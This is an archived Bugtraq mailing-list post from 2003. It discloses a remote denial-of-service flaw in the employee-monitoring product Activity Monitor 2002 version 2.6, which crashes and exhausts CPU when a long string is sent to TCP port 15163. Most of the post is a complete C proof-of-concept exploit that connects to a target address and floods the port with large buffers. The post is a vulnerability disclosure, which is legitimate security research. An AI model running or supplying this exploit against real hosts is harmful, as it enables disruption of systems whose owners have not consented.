lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 29 May 2003 15:22:03 -0000
From: Luca Ercoli <luca.ercoli@...ind.it>
To: bugtraq@...urityfocus.com
Subject: Activity Monitor 2002 remote Denial of Service




Overview: "Activity Monitor 2002 is a monitoring software system for real 
time employee
          monitoring and continuous tracking of users activities on 
networked computers."
	  More information can be found at www.softactivity.com


Vulnerability Description: By connecting TCP port 15163 and sending a long 
string, a remote
			   attacker could cause the application to crash 
and exhaust CPU
			   resources.


Affected Software: Activity Monitor 2002 ver. 2.6



Exploit:

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>



int main(int argc, char **argv)
{

  int i,ck,port,sd;
  char dos[10000];

  struct sockaddr_in act_mon_server;

  if(argc < 2)
  { 
    printf("\nUsage: %s <ip>\n", argv[0]);
    exit(0);
  }
  
  port = 15163;
    
  for(i = 0; i < 10000; i++) dos[i] = 'x';
  
  act_mon_server.sin_family = AF_INET;
  act_mon_server.sin_port = htons((u_short)port);
  act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);
   
  sd = socket(AF_INET, SOCK_STREAM, 0);
  
  ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof
(act_mon_server)); 
  
  if(ck != 0) { 
    perror("Connect");
    exit(0);
    }
  
  printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
  printf("\t\tby Luca Ercoli luca.ercoli@...ind.it\n\n");

  write(sd, dos, sizeof(dos)); 
  write(sd, dos, sizeof(dos));
  write(sd, dos, sizeof(dos));
  
  printf("\nDoS sent!\n");
  
  close(sd);

  exit(0);
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ